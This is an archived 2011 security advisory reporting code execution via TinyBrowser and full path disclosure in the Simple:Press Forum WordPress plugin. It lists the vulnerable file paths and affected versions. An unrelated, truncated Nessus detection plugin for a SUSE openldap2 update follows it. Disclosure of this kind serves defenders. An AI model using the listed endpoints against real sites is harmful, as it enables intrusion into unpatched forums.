Code Execution and FPD vulnerabilities in Simple:Press Forum for WordPress
2011-10-24T00:00:00
ID SECURITYVULNS:DOC:27212 Type securityvulns Reporter Securityvulns Modified 2011-10-24T00:00:00
Description
Hello 3APA3A!
I want to warn you about multiple security vulnerabilities in plugin Simple:Press Forum for WordPress.
These are Code Execution and Full path disclosure vulnerabilities.
Code Execution (WASC-31):
Execution of arbitrary code is possible via TinyBrowser. As I already told concerning TinyBrowser for TinyMCE (http://securityvulns.ru/docs26660.html), the program is vulnerable to three methods of code execution.
Four last FPD vulnerabilities have place in TinyMCE, which is shipped with SPF.
There were many FPD in old versions of SPF, part of them were fixed already in the last version 4.4.5. Particularly in old versions (such as 4.1.1) there are FPD in folder admin:
And in some other files in subfolders of the folders admin, editors and others. In the last version the only five above-mentioned FPD have left.
To CE vulnerable are Simple:Press Forum 4.1.2 and previous versions. In version SPF 4.1.3, which released at 31.12.2009, TinyBrowser was completely removed (developers decided not to fix it by themselves or wait for a fix from developer of TinyBrowser, but just removed it). Already after removing of TinyBrowser from SPF there were found new methods of code execution in this application, so users of old versions of SPF became even more vulnerable (as at web servers Apache, as at IIS).
To FPD vulnerable are Simple:Press 4.4.5 and previous versions.
I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5062/
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
{"id": "SECURITYVULNS:DOC:27212", "bulletinFamily": "software", "title": "Code Execution and FPD vulnerabilities in Simple:Press Forum for WordPress", "description": "Hello 3APA3A!\r\n\r\nI want to warn you about multiple security vulnerabilities in plugin Simple:Press Forum for WordPress.\r\n\r\nThese are Code Execution and Full path disclosure vulnerabilities.\r\n\r\nCode Execution (WASC-31):\r\n\r\nExecution of arbitrary code is possible via TinyBrowser. As I already told concerning TinyBrowser for TinyMCE (http://securityvulns.ru/docs26660.html), the program is vulnerable to three methods of code execution.\r\n\r\nhttp://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php\r\n\r\nFull path disclosure (WASC-13):\r\n\r\nhttp://site/wp-content/plugins/simple-forum/styles/icons/default/ICON_DEFAULTS.php\r\n\r\nhttp://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/EnchantSpell.php\r\n\r\nhttp://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/GoogleSpell.php\r\n\r\nhttp://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpell.php\r\n\r\nhttp://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpellShell.php\r\n\r\nFour last FPD vulnerabilities have place in TinyMCE, which is shipped with SPF.\r\n\r\nThere were many FPD in old versions of SPF, part of them were fixed already in the last version 4.4.5. Particularly in old versions (such as 4.1.1) there are FPD in folder admin:\r\n\r\nhttp://site/wp-content/plugins/simple-forum/admin/sfa-framework.php\r\n\r\nhttp://site/wp-content/plugins/simple-forum/admin/sfa-menu.php\r\n\r\nAnd in some other files in subfolders of the folders admin, editors and others. In the last version the only five above-mentioned FPD have left. \r\n\r\nTo CE vulnerable are Simple:Press Forum 4.1.2 and previous versions. In version SPF 4.1.3, which released at 31.12.2009, TinyBrowser was completely removed (developers decided not to fix it by themselves or wait for a fix from developer of TinyBrowser, but just removed it). Already after removing of TinyBrowser from SPF there were found new methods of code execution in this application, so users of old versions of SPF became even more vulnerable (as at web servers Apache, as at IIS).\r\n\r\nTo FPD vulnerable are Simple:Press 4.4.5 and previous versions.\r\n\r\nI mentioned about these vulnerabilities at my site: \r\nhttp://websecurity.com.ua/5062/\r\n\r\nBest wishes & regards,\r\nMustLive\r\nAdministrator of Websecurity web site\r\nhttp://websecurity.com.ua", "published": "2011-10-24T00:00:00", "modified": "2011-10-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27212", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 18, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2018-08-31T11:10:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "zdt", "idList": ["1337DAY-ID-27212"]}, {"type": "threatpost", "idList": ["THREATPOST:8ACB850E2F24B185C3D934BB3A6FDEBC"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:42", "rev": 2}, "vulnersScore": 6.7}, "affectedSoftware": []}
{"nessus": [{"lastseen": "2021-03-07T07:08:35", "description": "This update for openldap2 fixes the following issues :\n\nbsc#1182408 CVE-2020-36230 - an assertion failure in slapd in the\nX.509 DN parsing in decode.c ber_next_element, resulting in denial of\nservice.\n\nbsc#1182411 CVE-2020-36229 - ldap_X509dn2bv crash in the X.509 DN\nparsing in ad_keystring, resulting in denial of service.\n\nbsc#1182412 CVE-2020-36228 - integer underflow leading to crash in the\nCertificate List Exact Assertion processing, resulting in denial of\nservice.\n\nbsc#1182413 CVE-2020-36227 - infinite loop in slapd with the\ncancel_extop Cancel operation, resulting in denial of service.\n\nbsc#1182416 CVE-2020-36225 - double free and slapd crash in the\nsaslAuthzTo processing, resulting in denial of service.\n\nbsc#1182417 CVE-2020-36224 - invalid pointer free and slapd crash in\nthe saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182415 CVE-2020-36226 - memch->bv_len miscalculation and slapd\ncrash in the saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182419 CVE-2020-36222 - assertion failure in slapd in the\nsaslAuthzTo validation, resulting in denial of service.\n\nbsc#1182420 CVE-2020-36221 - slapd crashes in the Certificate Exact\nAssertion processing, resulting in denial of service (schema_init.c\nserialNumberAndIssuerCheck).\n\nbsc#1182418 CVE-2020-36223 - slapd crash in the Values Return Filter\ncontrol handling, resulting in denial of service (double free and\nout-of-bounds read).\n\nbsc#1182279 CVE-2021-27212 - an assertion failure in slapd can occur\nin the issuerAndThisUpdateCheck function via a crafted packet,\nresulting in a denial of service (daemon exit) via a short timestamp.\nThis is related to schema_init.c and checkTime.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-03-04T00:00:00", "title": "SUSE SLES12 Security Update : openldap2 (SUSE-SU-2021:0693-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-36222", "CVE-2021-27212", "CVE-2020-36224", "CVE-2020-36229", "CVE-2020-36226", "CVE-2020-36227", "CVE-2020-36221", "CVE-2020-36228", "CVE-2020-36223", "CVE-2020-36225", "CVE-2020-36230"], "modified": "2021-03-04T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openldap2-debugsource", "p-cpe:/a:novell:suse_linux:openldap2-back-meta-debuginfo", "p-cpe:/a:novell:suse_linux:openldap2-back-meta", "p-cpe:/a:novell:suse_linux:openldap2-debuginfo", "p-cpe:/a:novell:suse_linux:openldap2", "p-cpe:/a:novell:suse_linux:libldap-2_4-2-debuginfo", "p-cpe:/a:novell:suse_linux:openldap2-ppolicy-check-password", "p-cpe:/a:novell:suse_linux:libldap-2_4-2", "p-cpe:/a:novell:suse_linux:openldap2-client", "p-cpe:/a:novell:suse_linux:openldap2-client-debuginfo", "p-cpe:/a:novell:suse_linux:libldap-2_4", "p-cpe:/a:novell:suse_linux:openldap2-ppolicy-check-password-debuginfo"], "id": "SUSE_SU-2021-0693-1.NASL", "href": "https://www.tenable.com/plugins/nessus/147134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:0693-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(147134);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/05\");\n\n script_cve_id(\"CVE-2020-36221\", \"CVE-2020-36222\", \"CVE-2020-36223\", \"CVE-2020-36224\", \"CVE-2020-36225\", \"CVE-2020-36226\", \"CVE-2020-36227\", \"CVE-2020-36228\", \"CVE-2020-36229\", \"CVE-2020-36230\", \"CVE-2021-27212\");\n script_xref(name:\"IAVB\", value:\"2021-B-0014\");\n\n script_name(english:\"SUSE SLES12 Security Update : openldap2 (SUSE-SU-2021:0693-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for openldap2 fixes the following issues :\n\nbsc#1182408 CVE-2020-36230 - an assertion failure in slapd in the\nX.509 DN parsing in decode.c ber_next_element, resulting in denial of\nservice.\n\nbsc#1182411 CVE-2020-36229 - ldap_X509dn2bv crash in the X.509 DN\nparsing in ad_keystring, resulting in denial of service.\n\nbsc#1182412 CVE-2020-36228 - integer underflow leading to crash in the\nCertificate List Exact Assertion processing, resulting in denial of\nservice.\n\nbsc#1182413 CVE-2020-36227 - infinite loop in slapd with the\ncancel_extop Cancel operation, resulting in denial of service.\n\nbsc#1182416 CVE-2020-36225 - double free and slapd crash in the\nsaslAuthzTo processing, resulting in denial of service.\n\nbsc#1182417 CVE-2020-36224 - invalid pointer free and slapd crash in\nthe saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182415 CVE-2020-36226 - memch->bv_len miscalculation and slapd\ncrash in the saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182419 CVE-2020-36222 - assertion failure in slapd in the\nsaslAuthzTo validation, resulting in denial of service.\n\nbsc#1182420 CVE-2020-36221 - slapd crashes in the Certificate Exact\nAssertion processing, resulting in denial of service (schema_init.c\nserialNumberAndIssuerCheck).\n\nbsc#1182418 CVE-2020-36223 - slapd crash in the Values Return Filter\ncontrol handling, resulting in denial of service (double free and\nout-of-bounds read).\n\nbsc#1182279 CVE-2021-27212 - an assertion failure in slapd can occur\nin the issuerAndThisUpdateCheck function via a crafted packet,\nresulting in a denial of service (daemon exit) via a short timestamp.\nThis is related to schema_init.c and checkTime.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36221/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36223/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36224/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36225/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36226/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36227/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36228/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36229/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36230/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2021-27212/\"\n );\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210693-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4d6276bc\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-693=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-693=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2021-693=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2021-693=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2021-693=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2021-693=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2021-693=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2021-693=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2021-693=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-693=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-693=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-693=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-693=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2021-693=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-693=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2021-693=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libldap-2_4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libldap-2_4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libldap-2_4-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-back-meta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-back-meta-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-ppolicy-check-password\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openldap2-ppolicy-check-password-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libldap-2_4-2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libldap-2_4-2-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libldap-2_4-2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libldap-2_4-2-debuginfo-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-back-meta-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-back-meta-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-client-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-client-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-debugsource-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-ppolicy-check-password-1.2-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openldap2-ppolicy-check-password-debuginfo-1.2-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libldap-2_4-2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libldap-2_4-2-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libldap-2_4-2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libldap-2_4-2-debuginfo-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-back-meta-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-back-meta-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-client-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-client-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-debugsource-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-ppolicy-check-password-1.2-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openldap2-ppolicy-check-password-debuginfo-1.2-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libldap-2_4-2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libldap-2_4-2-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libldap-2_4-2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libldap-2_4-2-debuginfo-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-back-meta-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-back-meta-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-client-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-client-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-debugsource-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-ppolicy-check-password-1.2-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openldap2-ppolicy-check-password-debuginfo-1.2-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libldap-2_4-2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libldap-2_4-2-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libldap-2_4-2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libldap-2_4-2-debuginfo-32bit-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-back-meta-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-back-meta-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-client-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-client-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-debuginfo-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-debugsource-2.4.41-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-ppolicy-check-password-1.2-18.83.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"openldap2-ppolicy-check-password-debuginfo-1.2-18.83.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openldap2\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-07T07:08:35", "description": "This update for openldap2 fixes the following issues :\n\nbsc#1182408 CVE-2020-36230 - an assertion failure in slapd in the\nX.509 DN parsing in decode.c ber_next_element, resulting in denial of\nservice.\n\nbsc#1182411 CVE-2020-36229 - ldap_X509dn2bv crash in the X.509 DN\nparsing in ad_keystring, resulting in denial of service.\n\nbsc#1182412 CVE-2020-36228 - integer underflow leading to crash in the\nCertificate List Exact Assertion processing, resulting in denial of\nservice.\n\nbsc#1182413 CVE-2020-36227 - infinite loop in slapd with the\ncancel_extop Cancel operation, resulting in denial of service.\n\nbsc#1182416 CVE-2020-36225 - double free and slapd crash in the\nsaslAuthzTo processing, resulting in denial of service.\n\nbsc#1182417 CVE-2020-36224 - invalid pointer free and slapd crash in\nthe saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182415 CVE-2020-36226 - memch->bv_len miscalculation and slapd\ncrash in the saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182419 CVE-2020-36222 - assertion failure in slapd in the\nsaslAuthzTo validation, resulting in denial of service.\n\nbsc#1182420 CVE-2020-36221 - slapd crashes in the Certificate Exact\nAssertion processing, resulting in denial of service (schema_init.c\nserialNumberAndIssuerCheck).\n\nbsc#1182418 CVE-2020-36223 - slapd crash in the Values Return Filter\ncontrol handling, resulting in denial of service (double free and\nout-of-bounds read).\n\nbsc#1182279 CVE-2021-27212 - an assertion failure in slapd can occur\nin the issuerAndThisUpdateCheck function via a crafted packet,\nresulting in a denial of service (daemon exit) via a short timestamp.\nThis is related to schema_init.c and checkTime.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-03-04T00:00:00", "title": "SUSE SLES12 Security Update : openldap2 (SUSE-SU-2021:0692-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-36222", "CVE-2021-27212", "CVE-2020-36224", "CVE-2020-36229", "CVE-2020-36226", "CVE-2020-36227", "CVE-2020-36221", "CVE-2020-36228", "CVE-2020-36223", "CVE-2020-36225", "CVE-2020-36230"], "modified": "2021-03-04T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:compat-libldap-2_3", "p-cpe:/a:novell:suse_linux:compat-libldap-2_3-0-debuginfo"], "id": "SUSE_SU-2021-0692-1.NASL", "href": "https://www.tenable.com/plugins/nessus/147030", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:0692-1.\n# The text itself is copyright (C) 